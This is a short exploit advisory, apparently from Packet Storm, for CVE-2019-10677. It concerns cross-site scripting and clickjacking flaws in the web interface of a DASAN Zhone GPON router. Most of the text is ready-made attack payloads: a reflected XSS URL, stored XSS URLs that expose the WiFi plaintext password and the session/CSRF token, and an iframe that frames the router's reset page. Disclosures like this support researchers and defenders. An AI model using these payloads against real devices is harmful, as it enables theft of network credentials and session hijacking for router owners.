DASAN Zhone ZNID GPON 2426A EU versions S3.1.285 and below suffer from multiple cross site scripting vulnerabilities.
a77cd27d921167b0a6dae25e3c0d2ceca2eec4f2cb65a38246c2810a9634ede8Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters.
# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
# Date: 31.03.2019
# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
# Vendor Homepage: https://dasanzhone.com
# Version: <= S3.1.285
# Alternate Version: <= S3.0.738
# Tested on: version S3.1.285 (alternate version S3.0.738)
# CVE : CVE-2019-10677
= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp
= Stored Cross-Site Scripting (XSS) =
* WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
* CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//
= Clickjacking =
<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed